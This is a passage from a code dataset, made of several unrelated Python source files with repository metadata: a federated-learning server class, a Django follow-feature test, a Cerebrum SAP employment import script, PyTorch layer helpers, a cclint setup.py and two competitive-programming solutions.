client.send_time_cost['total_cost'] += 2 * (time.time() - start_time)\n\n def send_parameters_fedbn(self): #added\n assert (len(self.clients) > 0)\n\n for client in self.clients:\n start_time = time.time()\n\n if client.send_slow:\n time.sleep(0.1 * np.abs(np.random.rand()))\n\n client.set_parameters_fedbn(copy.deepcopy(self.global_model)) #changed\n\n client.send_time_cost['num_rounds'] += 1\n client.send_time_cost['total_cost'] += 2 * (time.time() - start_time)\n\n def send_parameters_fedrep(self): #added\n assert (len(self.clients) > 0)\n\n for client in self.clients:\n start_time = time.time()\n\n if client.send_slow:\n time.sleep(0.1 * np.abs(np.random.rand()))\n\n client.set_parameters_fedrep(copy.deepcopy(self.global_model)) #changed\n\n client.send_time_cost['num_rounds'] += 1\n client.send_time_cost['total_cost'] += 2 * (time.time() - start_time)\n\n\n def receive_models(self):\n assert (len(self.selected_clients) > 0)\n\n active_clients = random.sample(\n self.selected_clients, int((1-self.client_drop_rate) * self.join_clients))\n\n active_train_samples = 0\n for client in active_clients:\n active_train_samples += client.train_samples\n\n self.uploaded_weights = []\n self.uploaded_models = []\n for client in active_clients:\n client_time_cost = client.train_time_cost['total_cost'] / client.train_time_cost['num_rounds'] + \\\n client.send_time_cost['total_cost'] / client.send_time_cost['num_rounds']\n if client_time_cost <= self.time_threthold:\n self.uploaded_weights.append(client.train_samples / active_train_samples)\n self.uploaded_models.append(copy.deepcopy(client.model))\n\n def add_parameters(self, w, client_model):\n for server_param, client_param in 
zip(self.global_model.parameters(), client_model.parameters()):\n server_param.data += client_param.data.clone() / self.join_clients\n\n def aggregate_parameters(self):\n assert (len(self.uploaded_models) > 0)\n\n for param in self.global_model.parameters():\n param.data = torch.zeros_like(param.data)\n \n for w, client_model in zip(self.uploaded_weights, self.uploaded_models):\n self.add_parameters(w, client_model)\n \n\n # def aggregate_parameters(self):\n\n # for param in self.global_model.parameters():\n # param.data = torch.zeros_like(param.data)\n\n # active_train_samples = 0\n # for client in self.selected_clients:\n # active_train_samples += client.train_samples\n\n # for client in self.selected_clients:\n # self.add_parameters(client, client.train_samples / active_train_samples)\n\n\n def save_global_model(self):\n model_path = os.path.join(\"models\", self.dataset)\n if not os.path.exists(model_path):\n os.makedirs(model_path)\n torch.save(self.global_model, os.path.join(model_path, self.algorithm + \"_server\" + \".pt\"))\n\n # def load_model(self):\n # model_path = os.path.join(\"models\", self.dataset, \"server\" + \".pt\")\n # assert (os.path.exists(model_path))\n # self.global_model = torch.load(model_path)\n\n # def model_exists(self):\n # return os.path.exists(os.path.join(\"models\", self.dataset, \"server\" + \".pt\"))\n\n def save_results(self):\n algo = self.dataset + \"_\" + self.algorithm\n result_path = \"../results/\"\n if not os.path.exists(result_path):\n os.makedirs(result_path)\n\n if (len(self.rs_test_acc) & len(self.rs_train_acc) & len(self.rs_train_loss)):\n algo = algo + \"_\" + self.goal + \"_\" + str(self.times)\n with h5py.File(result_path + \"{}.h5\".format(algo), 'w') as hf:\n hf.create_dataset('rs_test_acc', data=self.rs_test_acc)\n hf.create_dataset('rs_train_acc', data=self.rs_train_acc)\n hf.create_dataset('rs_train_loss', data=self.rs_train_loss)\n\n def test_accuracy(self):\n num_samples = []\n tot_correct = []\n for c in self.clients:\n ct, ns = c.test_accuracy()\n tot_correct.append(ct*1.0)\n num_samples.append(ns)\n\n ids = [c.id for c in self.clients]\n\n return ids, num_samples, tot_correct\n\n def train_accuracy_and_loss(self):\n num_samples = []\n tot_correct = []\n losses = []\n for c in self.clients:\n ct, cl, ns = c.train_accuracy_and_loss()\n tot_correct.append(ct*1.0)\n num_samples.append(ns)\n losses.append(cl*1.0)\n\n ids = [c.id for c in self.clients]\n\n return ids, num_samples, tot_correct, losses\n\n # evaluate all clients\n def evaluate(self):\n stats = self.test_accuracy()\n stats_train = self.train_accuracy_and_loss()\n\n test_acc = sum(stats[2])*1.0 / sum(stats[1])\n train_acc = sum(stats_train[2])*1.0 / sum(stats_train[1])\n train_loss = sum(stats_train[3])*1.0 / sum(stats_train[1])\n \n self.rs_test_acc.append(test_acc)\n self.rs_train_acc.append(train_acc)\n self.rs_train_loss.append(train_loss)\n self.print_(test_acc, train_acc, train_loss)\n\n for x,y in zip(stats[2],stats[1]):\n #print(\"------------------------------\")\n print(\"client Accurancy: \", x*1.0/y)\n\n def print_(self, test_acc, train_acc, train_loss):\n print(\"Average Test Accurancy: {:.4f}\".format(test_acc))\n print(\"Average Train Accurancy: {:.4f}\".format(train_acc))\n print(\"Average Train Loss: {:.4f}\".format(train_loss))\n 
print(\"----------------------------------------\")\n","repo_name":"wanglikuan/0708_byol2","sub_path":"BYOL-2/serverbase.py","file_name":"serverbase.py","file_ext":"py","file_size_in_byte":8969,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"}
{"seq_id":"10625017848","text":"import math\ntt = int(input())\n\nfor _ in range(tt):\n n,m,k = map(int, input().split())\n\n cpp = n//k\n if m <= cpp:\n print(m)\n else:\n out = cpp - math.ceil((m-cpp)/(k-1))\n print(out)","repo_name":"Noprop/codeforces","sub_path":"striver/maths/berlandpoker.py","file_name":"berlandpoker.py","file_ext":"py","file_size_in_byte":212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
{"seq_id":"24012526389","text":"from django.test import Client, TestCase\nfrom django.urls import reverse\nfrom django.core.cache import cache\nfrom itertools import islice\n\nfrom ..models import Group, Post, Follow, User\n\n\nclass FollowingTests(TestCase):\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n cls.user = User.objects.create_user(username=\"auth\")\n cls.user2 = User.objects.create_user(username=\"NotAuth\")\n\n cls.COUNT_CREATE_POST = 2\n batch_size = 1\n cls.post = (\n Post(\n author=cls.user,\n group=Group.objects.create(\n title=\"Test group %s\" % i,\n slug=\"test-slug%s\" % i,\n description=\"Test description\",\n ),\n text=\"Test %s\" % i,\n )\n for i in range(cls.COUNT_CREATE_POST)\n )\n while True:\n batch = list(islice(cls.post, batch_size))\n if not batch:\n break\n Post.objects.bulk_create(batch, batch_size)\n\n def setUp(self):\n cache.clear()\n # Create an authorized client\n self.authorized_client = Client()\n self.authorized_client.force_login(self.user)\n # Create an unauthorized client\n self.guest_client = Client()\n # Create an author\n self.author = Client()\n # Log the author in\n self.author.force_login(self.user)\n # Create a non-author\n self.second_author = Client()\n self.second_author.force_login(self.user2)\n\n def test_autoriz_user_following(self):\n \"\"\"Check that a user can follow other users\"\"\"\n count_follow = Follow.objects.count()\n post = Post.objects.first()\n template_follow = \"posts:profile_follow\"\n self.second_author.get(\n reverse(template_follow, kwargs={\"username\": post.author})\n )\n # verify the follow was created\n self.assertEqual(Follow.objects.count(), count_follow + 1)\n self.assertEqual(Follow.objects.last().author, post.author)\n self.assertEqual(Follow.objects.last().user, self.user2)\n\n def test_autoriz_user_unfollowing(self):\n \"\"\"Check that a user can unfollow an author\"\"\"\n template_unfollow = \"posts:profile_unfollow\"\n count_follow = Follow.objects.count()\n post = Post.objects.first()\n self.second_author.get(\n reverse(template_unfollow, kwargs={\"username\": post.author})\n )\n self.assertEqual(Follow.objects.count(), count_follow)\n\n def test_new_post_in_follow_list(self):\n \"\"\"Check that a post does not appear for a non-follower\"\"\"\n post = Post.objects.first()\n cache.clear()\n another_user = User.objects.create(username=\"NoName\")\n self.authorized_client.force_login(another_user)\n response_another_follower = self.authorized_client.get(\n reverse(\"posts:follow_index\")\n )\n self.assertNotIn(post, 
response_another_follower.context[\"page_obj\"])\n","repo_name":"Viteron/hw05_final","sub_path":"yatube/posts/tests/test_following.py","file_name":"test_following.py","file_ext":"py","file_size_in_byte":3281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"43245803255","text":"import argparse\nimport datetime\nimport os\n\nimport cereconf\n\nfrom Cerebrum import Errors\nfrom Cerebrum.database import Database\nfrom Cerebrum.Utils import Factory\nfrom Cerebrum.Utils import NotSet\nfrom Cerebrum.utils.funcwrap import memoize\nfrom Cerebrum.modules.no.hia.mod_sap_utils import load_expired_employees\nfrom Cerebrum.modules.no.hia.mod_sap_utils import load_invalid_employees\nfrom Cerebrum.modules.no.hia.mod_sap_utils import make_employment_iterator\nfrom Cerebrum.modules.no.Constants import SAPLonnsTittelKode\n\n\ndef sap_employment2affiliation(sap_lonnstittelkode):\n \"\"\"Decide the affiliation to assign to a particular employment entry.\n\n The rules are:\n\n * aff = ANSATT, and VIT/ØVR depending on lonnstittelkode, when:\n sap_lonnstittelkode != 20009999 (const.sap_9999_dummy_stillingskode)\n fo_kode != 9999\n\n * aff = TILKNYTTET/ekstern, when:\n sap_lonnstittelkode = 20009999 (const.sap_9999_dummy_stillingskode)\n fo_kode != 9999\n \"\"\"\n\n try:\n lonnskode = SAPLonnsTittelKode(sap_lonnstittelkode)\n kategori = lonnskode.get_kategori()\n if not isinstance(kategori, unicode):\n kategori = kategori.decode(Database.encoding)\n except Errors.NotFoundError:\n logger.warn(u\"No SAP.STELL/lønnstittelkode <%s> found in Cerebrum\",\n sap_lonnstittelkode)\n return None, None\n\n if lonnskode != constants.sap_9999_dummy_stillingskode:\n affiliation = constants.affiliation_ansatt\n status = {\n u'ØVR': constants.affiliation_status_ansatt_tekadm,\n u'VIT': constants.affiliation_status_ansatt_vitenskapelig}[kategori]\n else:\n affiliation = constants.affiliation_tilknyttet\n status = constants.affiliation_status_tilknyttet_ekstern\n\n return affiliation, status\n\n\n@memoize\ndef get_ou_id(sap_ou_id):\n \"\"\"\n Map SAP OU id to Cerebrum entity_id.\n \"\"\"\n\n ou = Factory.get(\"OU\")(database)\n try:\n ou.find_by_external_id(constants.externalid_sap_ou, sap_ou_id)\n return int(ou.entity_id)\n except Errors.NotFoundError:\n return None\n\n\ndef get_person(sap_person_id):\n \"\"\"\n Map SAP ansattnr to Cerebrum entity_id.\n \"\"\"\n\n person = Factory.get(\"Person\")(database)\n try:\n person.find_by_external_id(constants.externalid_sap_ansattnr,\n sap_person_id)\n return person\n except Errors.NotFoundError:\n return None\n\n\ndef cache_db_affiliations():\n \"\"\"Return a cache with all affilliation_ansatt.\n\n The cache itself is a mapping person_id -> person-mapping, where\n person-mapping is a mapping ou_id -> status. I.e. with each person_id we\n associate all affiliation_ansatt that the person has indexed by ou_id.\n \"\"\"\n\n person = Factory.get(\"Person\")(database)\n # A cache dictionary mapping person -> D, where D is a mapping (ou_id,\n # affiliation) -> status. Why such a weird arrangement? Well, the API\n # makes it easier to delete all affiliations one person at a time\n # (therefore, person_id as the first-level key).\n #\n # Then, if an affiliation status changes, we cannot just yank the\n # affiliation out (because there would be a FK to it) and we need to\n # update, rather than remove-add it. 
Thus the magic with ou/affiliation as\n # the second key.\n cache = dict()\n for row in person.list_affiliations(\n source_system=constants.system_sap,\n affiliation=(constants.affiliation_ansatt,\n constants.affiliation_tilknyttet)):\n p_id, ou_id, affiliation, status = [int(row[x]) for x in\n (\"person_id\", \"ou_id\",\n \"affiliation\", \"status\",)]\n cache.setdefault(p_id, {})[(ou_id, affiliation)] = status\n\n return cache\n\n\ndef remove_affiliations(cache):\n \"Remove all affiliations in cache from Cerebrum.\"\n\n # cache is mapping person-id => mapping (ou-id, aff) => status. All these\n # mappings are all for affiliation_ansatt.\n person = Factory.get(\"Person\")(database)\n logger.debug(\"Removing affiliations for %d people\", len(cache))\n\n for person_id in cache:\n try:\n person.clear()\n person.find(person_id)\n except Errors.NotFoundError:\n logger.warn(\"person_id %s is in cache, but not in Cerebrum\",\n person_id)\n continue\n\n # person is here, now we delete all the affiliation_ansatt\n # affiliations.\n handle = True\n if 'handled' in cache[person_id]:\n handle = not cache[person_id]['handled']\n del cache[person_id]['handled']\n for (ou_id, affiliation) in cache[person_id].iterkeys():\n if handle:\n person.delete_affiliation(ou_id,\n affiliation,\n constants.system_sap)\n logger.debug(\"Removed aff=%s/ou_id=%s for %s\",\n constants.PersonAffiliation(affiliation),\n ou_id, person_id)\n\n\ndef synchronize_affiliations(aff_cache, person, ou_id,\n affiliation, status):\n \"\"\"Register/update an affiliation for a specific person.\n\n aff_cache is updated destructively.\n\n person must be associated with a person in the db.\n \"\"\"\n\n # A log message has already been issued...\n if (affiliation, status) == (None, None):\n return\n\n logger.debug(\"Registering affiliation %s/%s for person_id %s\",\n affiliation, status, person.entity_id)\n\n # For accessing aff_cache\n key_level1 = int(person.entity_id)\n key_level2 = (int(ou_id), int(affiliation))\n\n # Ok, now we have everything we need to register/adjusted affiliations\n # case 1: the affiliation did not exist => make a new affiliation\n person.populate_affiliation(constants.system_sap,\n ou_id,\n affiliation,\n status)\n\n if key_level1 not in aff_cache:\n aff_cache[key_level1] = {'handled': True}\n else:\n aff_cache[key_level1]['handled'] = True\n if key_level2 not in aff_cache[key_level1]:\n logger.debug(\"New affiliation %s (status: %s) for (person_id: %s)\",\n affiliation, status, person.entity_id)\n\n # case 2: the affiliation did exist => update aff.status and fix the cache\n else:\n cached_status = aff_cache[key_level1][key_level2]\n # Update cache info (we'll need this to delete obsolete\n # affiliations from Cerebrum). Remember that if aff.status is the\n # only thing changing, then we should not delete the \"old\"\n # aff.status entry. 
Thus, regardless of the aff.status, we must\n # clear the cache.\n del aff_cache[key_level1][key_level2]\n if not aff_cache[key_level1]:\n del aff_cache[key_level1]\n\n # The affiliation is there, but the status is different => update\n if cached_status != int(status):\n logger.debug(\"Updating affiliation status %s => %s for \"\n \"(p_id: %s)\",\n str(constants.PersonAffStatus(cached_status)),\n status, person.entity_id)\n else:\n logger.debug(\"Refreshing last seen for aff %s for (person id: %s)\",\n status, person.entity_id)\n\n\ndef process_affiliations(employment_file, person_file, use_fok,\n people_to_ignore=None):\n \"\"\"Parse employment_file and determine all affiliations.\n\n There are roughly 3 distinct parts:\n\n #. Cache all the affiliations in Cerebrum\n #. Scan the file and compare the file data with the cache. When there is a\n match, remove the entry from the cache.\n #. Remove from Cerebrum whatever is left in the cache (once we are done\n with the file, the cache contains those entries that were in Cerebrum\n \"\"\"\n\n expired = load_expired_employees(file(person_file), use_fok, logger)\n\n # First we cache all existing affiliations. It's a mapping person-id =>\n # mapping (ou-id, affiliation) => status.\n affiliation_cache = cache_db_affiliations()\n person_cache = dict()\n\n def person_cacher(empid):\n ret = person_cache.get(empid, NotSet)\n if ret is NotSet:\n ret = person_cache[empid] = get_person(empid)\n return ret\n\n for tpl in make_employment_iterator(\n file(employment_file), use_fok, logger):\n if not tpl.valid():\n logger.debug(\"Ignored invalid entry for person while \"\n \"processing affiliation: «%s»\",\n tpl.sap_ansattnr)\n continue\n\n if people_to_ignore and tpl.sap_ansattnr in people_to_ignore:\n logger.debug(\"Invalid person with sap_id=%s\", tpl.sap_ansattnr)\n continue\n\n if tpl.sap_ansattnr in expired:\n logger.debug(\"Person sap_id=%s is no longer an employee; \"\n \"all employment info will be ignored\",\n tpl.sap_ansattnr)\n continue\n\n # is the entry within a valid time frame?\n # The shift by 180 days has been requested by UiA around 2007-03-27\n if not tpl.start_date or not tpl.end_date:\n logger.debug(\"Entry %s has no timeframe\", tpl)\n continue\n if not (tpl.start_date -\n datetime.timedelta(days=180) <= datetime.date.today() <=\n tpl.end_date):\n logger.debug(\"Entry %s has wrong timeframe (start: %s, end: %s)\",\n tpl, tpl.start_date, tpl.end_date)\n continue\n\n ou_id = get_ou_id(tpl.sap_ou_id)\n if ou_id is None:\n logger.warn(\"Cannot map SAP OU %s to Cerebrum ou_id (employment \"\n \"for person sap_id=%s).\",\n tpl.sap_ou_id, tpl.sap_ansattnr)\n continue\n\n person = person_cacher(tpl.sap_ansattnr)\n if person is None:\n logger.warn(\"Cannot map SAP ansattnr %s to cerebrum person_id\",\n tpl.sap_ansattnr)\n continue\n\n (affiliation,\n affiliation_status) = sap_employment2affiliation(tpl.lonnstittel)\n\n synchronize_affiliations(affiliation_cache,\n person,\n ou_id, affiliation,\n affiliation_status)\n\n # We are done with fetching updates from file.\n # Need to write persons\n for p in person_cache.values():\n if p is None:\n continue\n logger.info(\"Writing cached affs for person id:%s\", p.entity_id)\n p.write_db()\n\n # All the affiliations left in the cache exist in Cerebrum, but NOT in the\n # datafile. 
Thus delete them!\n remove_affiliations(affiliation_cache)\n\n\ndef cache_db_employments():\n \"\"\"\n Preload all existing employment data.\n\n Note that we just need the primary keys here.\n \"\"\"\n\n logger.debug(\"Preloading all existing employments\")\n result = set()\n person = Factory.get(\"Person\")(database)\n for row in person.search_employment(source_system=constants.system_sap):\n key = (row[\"person_id\"], row[\"ou_id\"], row[\"description\"],\n row[\"source_system\"])\n result.add(key)\n\n logger.debug(\"Done preloading all existing employments\")\n return result\n\n\ndef remove_db_employments(remaining_employments):\n \"\"\"\n Nuke whatever remains of employments.\n\n Whichever keys remain in remaining_employments, they exist in the db, but\n not in the source file.\n \"\"\"\n\n logger.debug(\"Will delete %s remaining employments\",\n len(remaining_employments))\n person = Factory.get(\"Person\")(database)\n for (pid, ou_id, title, source) in remaining_employments:\n person.clear()\n person.find(pid)\n person.delete_employment(ou_id, title, source)\n # If person has a work_title defined and it matches the current\n # employment's title, remove work_title as well.\n try:\n if title == person.get_name_with_language(constants.work_title,\n constants.language_nb):\n person.delete_name_with_language(constants.work_title,\n constants.language_nb)\n except Errors.NotFoundError:\n pass\n\n logger.debug(\"Completed deletion\")\n\n\ndef synchronise_employment(employment_cache, tpl, person, ou_id):\n \"\"\"\n Synchronise a specific employment entry with the database.\n\n Updates employment_cache destructively.\n \"\"\"\n\n try:\n employment = SAPLonnsTittelKode(tpl.lonnstittel)\n description = employment.description\n except Errors.NotFoundError as e:\n logger.warn(\"Unknown lonnstittelkode %s for person with SAP-id: %s\",\n tpl.lonnstittel, tpl.sap_ansattnr)\n logger.warn(e)\n return\n\n if \" \" not in description:\n logger.debug(\"Employment type %s for person %s\"\n \" missing code/description\",\n description, person.entity_id)\n return\n\n code, title = description.split(\" \", 1)\n if not code.isdigit():\n logger.debug(\"Employment for %s is missing code/title: %s\",\n person.entity_id, description)\n return\n\n key = (person.entity_id, ou_id, title, constants.system_sap)\n if key in employment_cache:\n employment_cache.remove(key)\n\n try:\n float(tpl.percentage)\n except TypeError:\n logger.debug(\"Invalid employment fraction specification in %s\",\n str(tpl))\n return\n\n if tpl.start_date and tpl.end_date:\n # This will either insert or update\n person.add_employment(ou_id, title, constants.system_sap,\n tpl.percentage, tpl.start_date, tpl.end_date,\n code, tpl.stillingstype == 'H')\n\n\ndef process_employments(employment_file, use_fok, people_to_ignore=None):\n \"Synchronise the data in person_employment based on the latest SAP file.\"\n\n logger.debug(\"processing employments\")\n employment_cache = cache_db_employments()\n for tpl in make_employment_iterator(\n file(employment_file), use_fok, logger):\n if not tpl.valid():\n logger.debug(\"Ignored invalid entry for person while \"\n \"processing employment: «%s»\",\n tpl.sap_ansattnr)\n continue\n\n if people_to_ignore and tpl.sap_ansattnr in people_to_ignore:\n # e.g. 
those with wrong MG/MU\n logger.debug(\"Invalid person with sap_id=%s\", tpl.sap_ansattnr)\n continue\n\n # just like process_affiliations\n ou_id = get_ou_id(tpl.sap_ou_id)\n if ou_id is None:\n logger.debug(\"No OU registered for SAP ou_id=%s\", tpl.sap_ou_id)\n continue\n\n person = get_person(tpl.sap_ansattnr)\n if person is None:\n logger.debug(\"No person is registered for SAP ansatt# %s\",\n tpl.sap_ansattnr)\n continue\n\n synchronise_employment(employment_cache, tpl, person, ou_id)\n # Add person to employee-set, which is later used by\n # populate_work_titles()\n if person not in employees:\n employees.add(person)\n\n remove_db_employments(employment_cache)\n logger.debug(\"done with employments\")\n\n\ndef populate_work_titles():\n \"\"\"\n Calculates the main employment entry for every person listed in the\n source file, and adds the description as the person's work_title.\n We first try to check which employment is defined as the person's main one.\n If no employment entry is defined as the main employment, we look through\n the other employments and use the entry with the highest percentage number.\n If several entries with an equal percentage number exists for a given\n person, the first one encountered is used.\n \"\"\"\n logger.debug('Populating work_titles...')\n logger.debug('Number of persons to set titles for: %d' % len(employees))\n for person in employees:\n main_employment = None\n employments = person.search_employment(person.entity_id,\n main_employment=True)\n for employment in employments:\n if main_employment is None or \\\n employment['percentage'] > main_employment['percentage']:\n main_employment = employment\n if main_employment is None:\n employments = person.search_employment(person.entity_id)\n for employment in employments:\n if main_employment is None or \\\n employment['percentage'] > main_employment['percentage']:\n main_employment = employment\n if main_employment is not None:\n person.add_name_with_language(name_variant=constants.work_title,\n name_language=constants.language_nb,\n name=main_employment['description'])\n person.write_db()\n logger.debug(\"Adding %s '%s' to person with entity_id %d\" %\n (str(constants.work_title),\n main_employment['description'],\n person.entity_id))\n\n\ndef main():\n global logger\n logger = Factory.get_logger('cronjob')\n\n parser = argparse.ArgumentParser(description=__doc__)\n required_args = parser.add_argument_group('required arguments')\n required_args.add_argument('-e', '--employment-file',\n dest='employment_file',\n required=True,\n help='File containing employment data-export '\n 'from SAP.')\n required_args.add_argument('-p', '--person-file', dest='person_file',\n required=True,\n help='File containing person data-export '\n 'from SAP.')\n parser.add_argument('--without-fok', dest='use_fok', action='store_false',\n help='Do not use forretningsområdekode for checking '\n 'if a person should be imported. 
(default: use.)')\n parser.set_defaults(use_fok=True)\n parser.add_argument('--with-employment', dest='sync_employment',\n action='store_true',\n help='Synchronise person employments based '\n 'on specified employment-file.')\n parser.set_defaults(sync_employment=False)\n parser.add_argument('-c', '--commit', dest='commit', action='store_true',\n help='Write changes to DB.')\n args = parser.parse_args()\n\n assert (args.person_file is not None and\n os.access(args.person_file, os.F_OK))\n assert (args.employment_file is not None and\n os.access(args.employment_file, os.F_OK))\n\n global database\n database = Factory.get(\"Database\")()\n database.cl_init(change_program=\"import_SAP\")\n\n global constants\n constants = Factory.get(\"Constants\")()\n\n global employees\n employees = set()\n\n if getattr(cereconf, 'SAP_MG_MU_CODES', None) and args.use_fok:\n raise Exception(\"Use of both MG/MU codes and fok isn't implemented\")\n\n ignored_people = load_invalid_employees(file(args.person_file),\n args.use_fok)\n\n if args.sync_employment:\n process_employments(args.employment_file,\n args.use_fok,\n ignored_people)\n populate_work_titles()\n\n process_affiliations(args.employment_file,\n args.person_file,\n args.use_fok,\n ignored_people)\n\n if args.commit:\n database.commit()\n logger.info(\"All changes committed\")\n else:\n database.rollback()\n logger.info(\"All changes rolled back\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"unioslo/cerebrum","sub_path":"contrib/no/hia/process_SAP_affiliations.py","file_name":"process_SAP_affiliations.py","file_ext":"py","file_size_in_byte":20223,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"78"} +{"seq_id":"20631726384","text":"import torch.nn as nn\n\n\ndef get_conv(\n in_channels,\n out_channels,\n kernel_size,\n stride=1,\n dilation=1,\n groups=1,\n bias=True,\n dim='2d',\n):\n \"\"\"Get Conv layer.\"\"\"\n return eval(f'nn.Conv{dim}')(\n in_channels,\n out_channels,\n kernel_size,\n stride=stride,\n padding=kernel_size // 2,\n dilation=dilation,\n groups=groups,\n bias=bias,\n )\n\n\ndef get_deconv(\n in_channels,\n out_channels,\n kernel_size,\n stride=1,\n dilation=1,\n groups=1,\n bias=True,\n dim='2d',\n):\n \"\"\"Get Conv layer.\"\"\"\n return eval(f'nn.ConvTranspose{dim}')(\n in_channels,\n out_channels,\n kernel_size,\n stride=stride,\n padding=kernel_size // 2,\n output_padding=stride - 1,\n dilation=dilation,\n groups=groups,\n bias=bias,\n )\n\n\ndef get_normalizer(norm, channels, groups=16, dim='2d'):\n \"\"\"Get normalization layer.\"\"\"\n if norm == '':\n return nn.Identity()\n elif norm == 'bn':\n return eval(f'nn.BatchNorm{dim}')(channels)\n elif norm == 'gn':\n # 16 is taken from Table 3 of the GN paper\n return nn.GroupNorm(groups, channels)\n elif norm == 'in':\n return eval(f'nn.InstanceNorm{dim}')(channels)\n elif norm == 'ln':\n return nn.LayerNorm(channels)\n else:\n raise ValueError(f'Normalizer {norm} not supported!')\n\n\ndef get_act_func(act):\n \"\"\"Get activation function.\"\"\"\n if act == '':\n return nn.Identity()\n if act == 'relu':\n return nn.ReLU()\n elif act == 'leakyrelu':\n return nn.LeakyReLU()\n elif act == 'tanh':\n return nn.Tanh()\n elif act == 'sigmoid':\n return nn.Sigmoid()\n elif act == 'swish':\n return nn.SiLU()\n elif act == 'elu':\n return nn.ELU()\n elif act == 'softplus':\n return nn.Softplus()\n elif act == 'mish':\n return nn.Mish()\n elif act == 'gelu':\n return nn.GELU()\n else:\n raise ValueError(f'Activation function {act} 
not supported!')\n\n\ndef conv_norm_act(\n in_channels,\n out_channels,\n kernel_size,\n stride=1,\n dilation=1,\n groups=1,\n norm='bn',\n act='relu',\n dim='2d',\n):\n \"\"\"Conv - Norm - Act.\"\"\"\n conv = get_conv(\n in_channels,\n out_channels,\n kernel_size,\n stride=stride,\n dilation=dilation,\n groups=groups,\n bias=norm not in ['bn', 'in'],\n dim=dim,\n )\n normalizer = get_normalizer(norm, out_channels, dim=dim)\n act_func = get_act_func(act)\n return nn.Sequential(conv, normalizer, act_func)\n\n\ndef deconv_norm_act(\n in_channels,\n out_channels,\n kernel_size,\n stride=1,\n dilation=1,\n groups=1,\n norm='bn',\n act='relu',\n dim='2d',\n):\n \"\"\"ConvTranspose - Norm - Act.\"\"\"\n deconv = get_deconv(\n in_channels,\n out_channels,\n kernel_size,\n stride=stride,\n dilation=dilation,\n groups=groups,\n bias=norm not in ['bn', 'in'],\n dim=dim,\n )\n normalizer = get_normalizer(norm, out_channels, dim=dim)\n act_func = get_act_func(act)\n return nn.Sequential(deconv, normalizer, act_func)\n\n\ndef fc_norm_act(in_features, out_features, norm='bn', act='relu'):\n \"\"\"FC - Norm - Act.\"\"\"\n fc = nn.Linear(in_features, out_features, bias=norm not in ['bn', 'in'])\n normalizer = get_normalizer(norm, out_features, dim='1d')\n act_func = get_act_func(act)\n return nn.Sequential(fc, normalizer, act_func)\n\n\ndef build_mlps(in_channels, hidden_sizes, out_channels, norm='bn', act='relu'):\n \"\"\"Construct MLP with norm and act.\"\"\"\n if not hidden_sizes: # None or empty list\n return nn.Linear(in_channels, out_channels)\n modules = [fc_norm_act(in_channels, hidden_sizes[0], norm=norm, act=act)]\n for i in range(0, len(hidden_sizes) - 1):\n modules.append(\n fc_norm_act(\n hidden_sizes[i], hidden_sizes[i + 1], norm=norm, act=act))\n modules.append(nn.Linear(hidden_sizes[-1], out_channels))\n return nn.Sequential(*modules)\n","repo_name":"Wuziyi616/nerv","sub_path":"nerv/models/modules.py","file_name":"modules.py","file_ext":"py","file_size_in_byte":4092,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"78"} +{"seq_id":"73410957372","text":"import os\nimport sys\n\nfrom distutils.core import setup\n\n\ndef fullsplit(path, result=None):\n \"\"\"\n Split a pathname into components (the opposite of os.path.join)\n in a platform-neutral way.\n \"\"\"\n if result is None:\n result = []\n head, tail = os.path.split(path)\n if head == '':\n return [tail] + result\n if head == path:\n return result\n return fullsplit(head, [tail] + result)\n\n\n# Compile the list of packages available, because distutils doesn't have\n# an easy way to do this.\npackages, package_data = [], {}\n\nroot_dir = os.path.dirname(__file__)\nif root_dir != '':\n os.chdir(root_dir)\ncclint_dir = 'cclint'\n\nfor dirpath, dirnames, filenames in os.walk(cclint_dir):\n # Ignore PEP 3147 cache dirs and those whose names start with '.'\n dirnames[:] = [d for d in dirnames if \\\n not d.startswith('.') and d != '__pycache__']\n parts = fullsplit(dirpath)\n package_name = '.'.join(parts)\n if '__init__.py' in filenames:\n packages.append(package_name)\n elif filenames:\n relative_path = []\n while '.'.join(parts) not in packages:\n relative_path.append(parts.pop())\n relative_path.reverse()\n path = os.path.join(*relative_path)\n package_files = package_data.setdefault('.'.join(parts), [])\n package_files.extend([os.path.join(path, f) for f in filenames])\n\nsetup(\n name='cclint',\n version='0.4',\n description=\"An enhanced version of the Goggle's cpplint tool\",\n 
author='Olli Wang',\n author_email='olliwang@ollix.com',\n url='https://github.com/ollix/cclint',\n license='BSD',\n packages=packages,\n install_requires=[\n 'colorama',\n 'cpplint'\n ],\n scripts=['cclint/bin/cclint'],\n entry_points={\n 'console_scripts': [\n 'cclint = cclint:command.execute_from_command_line',\n ],\n },\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Environment :: Console',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: BSD License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 3',\n 'Topic :: Terminals',\n ]\n)\n","repo_name":"ollix/cclint","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2284,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"78"} +{"seq_id":"13364729047","text":"from collections import defaultdict\n\n\nclass Solution(object):\n def validTree(self, n, edges):\n \"\"\"\n :type n: int\n :type edges: List[List[int]]\n :rtype: bool\n \"\"\"\n edges_dict = defaultdict(list)\n for e in edges:\n edges_dict[e[0]].append(e[1])\n edges_dict[e[1]].append(e[0])\n\n def dfs(node, prev):\n # use prev here since this is undirected graph and we want\n # to avoid travel back using the same edge.\n visited.add(node)\n if node in edges_dict:\n for next in edges_dict[node]:\n if next == prev:\n continue\n if next in visited:\n return False\n if not dfs(next, node):\n return False\n return True\n\n # here since any connected graph without simple cycles is a tree\n # we can just do dfs starting at any node.\n visited = set()\n if not dfs(0, None):\n return False\n return len(visited) == n\n\n\nif __name__ == '__main__':\n print(Solution().validTree(5, [[0, 1], [0, 2], [0, 3], [1, 4]]))\n print(Solution().validTree(5, [[0, 1], [1, 2], [2, 3], [1, 3], [1, 